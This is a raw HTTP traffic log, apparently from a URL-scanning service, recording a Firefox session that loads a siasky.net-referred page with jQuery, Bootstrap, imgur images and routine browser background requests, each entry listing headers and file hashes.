date: Tue, 04 Oct 2022 09:53:50 GMT
content-encoding: gzip
content-length: 23856
last-modified: Fri, 12 Aug 2022 13:47:02 GMT
accept-ranges: bytes
server: nginx
etag: W/"62f659d6-10fdd"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1664877230.dop012.sk1.t,1664877230.cds254.sk1.hn,1664877230.cds235.sk1.c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32012)
Size:   23856
Md5:    30f5157a965bc792a83e9bacfe265f03
Sha1:   8330886371fe27f3cbac509e0ac9712207574c66
Sha256: 4d12cab1f84ec2ac780bc8e0d865d9c61025be579c78d6532d76f0574d17fca0
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 04 Oct 2022 09:53:50 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Type, Alert, Backoff, Retry-After, Content-Length
Cache-Control: max-age=3600
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Tue, 04 Oct 2022 08:56:17 GMT
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 475d4ecb64796af058573c6f1048e898.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: UxhKpFefOHnGGxBXgrD2RuE2duylhmZ32kBcjL5NUoEm4Ev1zgEztA==
Age: 3453


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    2d12f67fe57a87e7366b662d153a5582
Sha1:   d7b02d81cc74f24a251d9363e0f4b0a149264ec1
Sha256: 73c273c0b5a2de3cb970b8e8c187999d3b55e760dc7766dab4bb76428d19b551
                                        
                                            GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=NO&count=30 HTTP/1.1 
Host: getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.5.221
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Tue, 04 Oct 2022 09:53:49 GMT
vary: Accept-Encoding
content-location: global-recs.php
tcn: choice
x-frame-options: SAMEORIGIN
status: 200 OK
x-source: Pocket
pragma: cache
p3p: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa OUR IND UNI COM NAV INT STA PRE"
x-cache: Miss from cloudfront
x-amz-cf-pop: SEA73-P2
x-amz-cf-id: YhjWNveCuTfGsMGjsN8wCAcGggtSIkg57JL0aV4-DKj3pyW2JyQMrA==
content-encoding: gzip
via: 1.1 bd6f70221217681265382902c6157c76.cloudfront.net (CloudFront), 1.1 google
cache-control: s-maxage=900,public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   44737
Md5:    5d8f1b94d746e3d2ca317a05462287fe
Sha1:   9b9c30e2848e2cf00865fa542b4528fe421a1659
Sha256: 5dd1c4ab93ef397c0cc2733dff92a8b1523fa56763a88edad1771ed8e2c40177
                                        
                                            GET /ajax/libs/jquery/2.2.4/jquery.min.js HTTP/1.1 
Host: ajax.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.74
HTTP/2 200 OK
content-type: text/javascript; charset=UTF-8
                                        
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/hosted-libraries-pushers
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="hosted-libraries-pushers"
report-to: {"group":"hosted-libraries-pushers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers"}]}
timing-allow-origin: *
content-length: 30028
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 28 Sep 2022 21:06:53 GMT
expires: Thu, 28 Sep 2023 21:06:53 GMT
cache-control: public, max-age=31536000, stale-while-revalidate=2592000
age: 478017
last-modified: Tue, 03 Mar 2020 19:15:00 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32065)
Size:   30028
Md5:    6d973c8b7e2439d958e09c0a1ab9fe50
Sha1:   05ae0830200c20b9a2dfd5a825adc400481a60fb
Sha256: f3c122dc227e829ed96b2a754296809201bd78abbad7ba50ef5079654e1cc894
                                        
                                            GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1 
Host: stackpath.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.18.11.207
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Tue, 04 Oct 2022 09:53:50 GMT
vary: Accept-Encoding
cdn-pullzone: 252412
cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestcountrycode: DE
access-control-allow-origin: *
cache-control: public, max-age=31919000
last-modified: Mon, 25 Jan 2021 22:04:06 GMT
cdn-cachedat: 11/15/2021 23:30:00
cdn-proxyver: 1.0
cdn-requestpullcode: 200
cdn-requestpullsuccess: True
cdn-edgestorageid: 723
cdn-status: 200
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
cdn-requestid: a35b0179a28ed953258d0fb41376a09c
cdn-cache: HIT
cf-cache-status: HIT
age: 7921078
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 754d0860bb330b41-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (50758)
Size:   14935
Md5:    87c3fcb33411a99746b142656450ccc9
Sha1:   5620b254ffb4cdc13a52c817931dcb57124442f7
Sha256: ac9faf42df7a202d3051193c5eebf84a9b9d09f49ea97d539d923c3437d3c6f5
                                        
                                            GET /css?family=Yellowtail&display=swap HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Tue, 04 Oct 2022 09:53:50 GMT
date: Tue, 04 Oct 2022 09:53:50 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2

                                        
                                            GET /staging.yuksdcbjsdbkdcbsdjh3.appspot.com/hover.css HTTP/1.1 
Host: storage.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.16
HTTP/2 404 Not Found
content-type: application/xml; charset=UTF-8
                                        
x-guploader-uploadid: ADPycdtdtiDiq-PwtcUJ7Xk5IuPsRbQLFqr0tNc1ZYYPe7u8RMcNjDTJ3Fn9lnb7FYJIxMhRjPZH42JdEvz8R1O1U7JHng
content-length: 212
date: Tue, 04 Oct 2022 09:53:50 GMT
expires: Tue, 04 Oct 2022 09:53:50 GMT
cache-control: private, max-age=0
server: UploadServer
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  XML 1.0 document text\012- XML document, ASCII text, with no line terminators
Size:   212
Md5:    4e3f0a2ea648557ff9520879be47a81b
Sha1:   d8cfc875e3ff574e8c8444559f6922918e7d90e0
Sha256: 4c32d3f0f2e394db3877bacd59b68a435773178f74d5067b728ef4e040527154
                                        
                                            GET /5ID5toV.png HTTP/1.1 
Host: i.imgur.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         151.101.84.193
HTTP/2 200 OK
content-type: image/png
                                        
last-modified: Mon, 02 Nov 2020 12:58:17 GMT
etag: "c3fc46c5799c76f9107504028f39190f"
cache-control: public, max-age=31536000
accept-ranges: bytes
date: Tue, 04 Oct 2022 09:53:50 GMT
age: 3085805
x-served-by: cache-iad-kiad7000145-IAD, cache-bma1681-BMA
x-cache: HIT, HIT
x-cache-hits: 1, 1
x-timer: S1664877231.664879,VS0,VE1
strict-transport-security: max-age=300
access-control-allow-methods: GET, OPTIONS
access-control-allow-origin: *
server: cat factory 1.0
x-content-type-options: nosniff
content-length: 771
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 26 x 26, 8-bit/color RGBA, non-interlaced\012- data
Size:   771
Md5:    c3fc46c5799c76f9107504028f39190f
Sha1:   519096ad3f03410cf9ce3c9b9fcca6b439d97b23
Sha256: 57898461712a639d119bdf88b7145919dcc8956c7a271d2e4a1084b29eae6785
                                        
                                            GET /0J0KUj0.png HTTP/1.1 
Host: i.imgur.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         151.101.84.193
HTTP/2 200 OK
content-type: image/png
                                        
last-modified: Mon, 02 Nov 2020 12:58:17 GMT
etag: "10751f1f1cd54ff50678ce5822626f25"
cache-control: public, max-age=31536000
accept-ranges: bytes
date: Tue, 04 Oct 2022 09:53:50 GMT
age: 3634418
x-served-by: cache-iad-kiad7000153-IAD, cache-bma1681-BMA
x-cache: HIT, HIT
x-cache-hits: 1, 1
x-timer: S1664877231.674189,VS0,VE1
strict-transport-security: max-age=300
access-control-allow-methods: GET, OPTIONS
access-control-allow-origin: *
server: cat factory 1.0
x-content-type-options: nosniff
content-length: 2983
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 187 x 188, 8-bit/color RGBA, non-interlaced\012- data
Size:   2983
Md5:    10751f1f1cd54ff50678ce5822626f25
Sha1:   7d17f1faaccc8c704ce89ca5b7089aa6cb909135
Sha256: 5e74d6beeaf8fcf8179879c1fa1aaaf559baa6849c04ea6c8d832b95c63d62e7
                                        
                                            GET /agNr5Vz.png HTTP/1.1 
Host: i.imgur.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         151.101.84.193
HTTP/2 200 OK
content-type: image/png
                                        
last-modified: Mon, 02 Nov 2020 13:08:02 GMT
etag: "20793fe81a5ded71207785a2b5891dac"
cache-control: public, max-age=31536000
accept-ranges: bytes
date: Tue, 04 Oct 2022 09:53:50 GMT
age: 1806061
x-served-by: cache-iad-kjyo7100103-IAD, cache-bma1681-BMA
x-cache: HIT, HIT
x-cache-hits: 1, 1
x-timer: S1664877231.678447,VS0,VE1
strict-transport-security: max-age=300
access-control-allow-methods: GET, OPTIONS
access-control-allow-origin: *
server: cat factory 1.0
x-content-type-options: nosniff
content-length: 66685
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 1280 x 1280, 8-bit/color RGBA, non-interlaced\012- data
Size:   66685
Md5:    20793fe81a5ded71207785a2b5891dac
Sha1:   8a633d7fd5e7ab31395579ccd13113c846f8c7de
Sha256: bcdf4efedbeffffb053002efc736dd5b9c7c8966a1d23e1168d35f2721d3a276
                                        
                                            GET /BRvBsqK.png HTTP/1.1 
Host: i.imgur.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         151.101.84.193
HTTP/2 200 OK
content-type: image/png
                                        
last-modified: Mon, 02 Nov 2020 12:58:17 GMT
etag: "c27ae9aa732191f42fbc6400aadaad64"
cache-control: public, max-age=31536000
accept-ranges: bytes
date: Tue, 04 Oct 2022 09:53:50 GMT
age: 1806061
x-served-by: cache-iad-kcgs7200105-IAD, cache-bma1681-BMA
x-cache: HIT, HIT
x-cache-hits: 466, 1
x-timer: S1664877231.680002,VS0,VE2
strict-transport-security: max-age=300
access-control-allow-methods: GET, OPTIONS
access-control-allow-origin: *
server: cat factory 1.0
x-content-type-options: nosniff
content-length: 6718
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 190 x 187, 8-bit/color RGBA, non-interlaced\012- data
Size:   6718
Md5:    c27ae9aa732191f42fbc6400aadaad64
Sha1:   47e0c8f1db3c9f392605fae4736029b59242c69f
Sha256: 8e20009cccb8d6669b5a182a8c4bd12041308470aee71e6a340f28434acc6842
                                        
                                            GET /XvAi8dK.jpg HTTP/1.1 
Host: i.imgur.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         151.101.84.193
HTTP/2 200 OK
content-type: image/jpeg
                                        
last-modified: Mon, 02 Nov 2020 12:57:09 GMT
etag: "99434e9b6f2a025ad00317cf927bc891"
cache-control: public, max-age=31536000
accept-ranges: bytes
date: Tue, 04 Oct 2022 09:53:50 GMT
age: 512762
x-served-by: cache-iad-kiad7000066-IAD, cache-bma1681-BMA
x-cache: HIT, MISS
x-cache-hits: 117, 0
x-timer: S1664877231.667583,VS0,VE100
strict-transport-security: max-age=300
access-control-allow-methods: GET, OPTIONS
access-control-allow-origin: *
server: cat factory 1.0
x-content-type-options: nosniff
content-length: 26208
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, baseline, precision 8, 400x400, components 3\012- data
Size:   26208
Md5:    99434e9b6f2a025ad00317cf927bc891
Sha1:   0d0d10518173953953f11ac736bf43cdec57760e
Sha256: cd853b098c9424ebb951f5cebaa206ffbb290eb54c76e85c9bda16de99e36a0a
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 2865
Cache-Control: 'max-age=158059'
Date: Tue, 04 Oct 2022 09:53:50 GMT
Last-Modified: Tue, 04 Oct 2022 09:06:06 GMT
Server: ECS (ska/F70B)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 04 Oct 2022 09:53:50 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /9AxSYZF.jpg HTTP/1.1 
Host: i.imgur.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         151.101.84.193
HTTP/2 200 OK
content-type: image/jpeg
                                        
last-modified: Mon, 02 Nov 2020 12:51:57 GMT
etag: "21c522bd6c0316908c081e61fc9368eb"
cache-control: public, max-age=31536000
accept-ranges: bytes
date: Tue, 04 Oct 2022 09:53:50 GMT
age: 3637208
x-served-by: cache-iad-kiad7000104-IAD, cache-bma1681-BMA
x-cache: HIT, HIT
x-cache-hits: 1, 1
x-timer: S1664877231.947226,VS0,VE2
strict-transport-security: max-age=300
access-control-allow-methods: GET, OPTIONS
access-control-allow-origin: *
server: cat factory 1.0
x-content-type-options: nosniff
content-length: 113767
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, baseline, precision 8, 1200x646, components 3\012- data
Size:   113767
Md5:    21c522bd6c0316908c081e61fc9368eb
Sha1:   383c38512970e9c613d38fa74a75bdf0a293ba92
Sha256: e5a91f9f4dd250eeaa23728e98eb79256b96bdd2291de3685072e565fce2263c
                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Tue, 04 Oct 2022 09:29:33 GMT
Cache-Control: max-age=3600, max-age=3600
Expires: Tue, 04 Oct 2022 10:27:25 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 410f51195842d9b592b15d6588c36654.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: 2YKh1BKQHrCtyg3pVJriP-xTHER4COaoW5W5j8CZBI--jkJIHhZXRw==
Age: 1458


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST /downloads?client=Firefox&appver=96.0a&pver=2.2 HTTP/1.1 
Host: shavar.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
Content-Length: 773
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: none
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         34.215.6.110
HTTP/1.1 200 OK
Content-Type: application/octet-stream
                                        
Date: Tue, 04 Oct 2022 09:53:51 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 8
Connection: Close


--- Additional Info ---
Magic:  ASCII text
Size:   8
Md5:    29fc57841962e407cb50c1be60284bf7
Sha1:   ce968a77e2996da5eee8925182318f171ccdce47
Sha256: ae7e7075247dcfad763f1e131aeac3d2e756bb03d48b0d315a50c69636e5dc8b
                                        
                                            GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1 
Host: maxcdn.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://siasky.net
Connection: keep-alive
Referer: https://siasky.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         104.18.11.207
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
date: Tue, 04 Oct 2022 09:53:50 GMT
vary: Accept-Encoding
cdn-pullzone: 252412
cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestcountrycode: DE
access-control-allow-origin: *
cache-control: public, max-age=31919000
last-modified: Mon, 25 Jan 2021 22:04:04 GMT
cdn-cachedat: 08/04/2021 00:04:37
cdn-edgestorageid: 601
cdn-requestpullcode: 200
cdn-requestpullsuccess: True
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
cdn-proxyver: 1.0
cdn-status: 200
cdn-requestid: de8909e225b1679f4e650afd9064c515
cdn-cache: HIT
cf-cache-status: HIT
age: 4896325
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 754d08608cfeb4fd-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (48664)
Size:   14000
Md5:    32f536c3e008b0d60385c5badab6828c
Sha1:   6f2aaa5e9db5641ef5ce2a1d5303853170c2a003
Sha256: c07047d88ce3cc7161edd071af1834d068b6da964bd3cea7ba55e0be8a71221b
                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: SW71H7z8YXa7zaT75Vx9ag==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         35.160.97.225
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: u1++pkBDnD2H4cCSbsgm6yJZd+c=

                                        
                                            GET /v1/buckets/monitor/collections/changes/changeset?_expected=%221664870231799%22 HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Alert, Content-Type, Backoff, Content-Length, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Tue, 04 Oct 2022 07:57:11 GMT
X-Content-Type-Options: nosniff
Content-Encoding: br
Cache-Control: max-age=3600, max-age=3600
Date: Tue, 04 Oct 2022 09:02:02 GMT
Expires: Tue, 04 Oct 2022 09:02:02 GMT
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 41dc61beb3fe8e8c2c299a2522d8330c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: KKjoo7X-CIf4AycJ--akUkL6suJl_d8Raq8akKNVmx-ltTSlhMMQkw==
Age: 3109


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (22383), with no line terminators
Size:   4715
Md5:    aa4dc80a940802df33f6f49e56307cb2
Sha1:   23a9032eae05dc49ebf218c3940b9f03b2a4bc58
Sha256: 8cd2bfd13ac0ccba0aa680f2b7c25a6b99981b5c5a9203d2228097d6a0ba7bcb
                                        
                                            GET /v1/buckets/blocklists/collections/addons-bloomfilters/changeset?_expected=1664843841165&_since=%221653914271178%22 HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.115
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length, Backoff, Content-Type, Retry-After, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Tue, 04 Oct 2022 00:37:21 GMT
X-Content-Type-Options: nosniff
Content-Encoding: br
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2022 09:42:53 GMT
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 41dc61beb3fe8e8c2c299a2522d8330c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: emb1tZmcgVJ8yejvllw6lqLZ3V2kMBGtCjhXxr62g6wTONBMQuP8gA==
Age: 658


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (65536), with no line terminators
Size:   12694
Md5:    5cf185631def1f6c6cdc07f71b5bb09b
Sha1:   e77a3cb34d90c0b0e3a14ecec13022ccc338bdd8
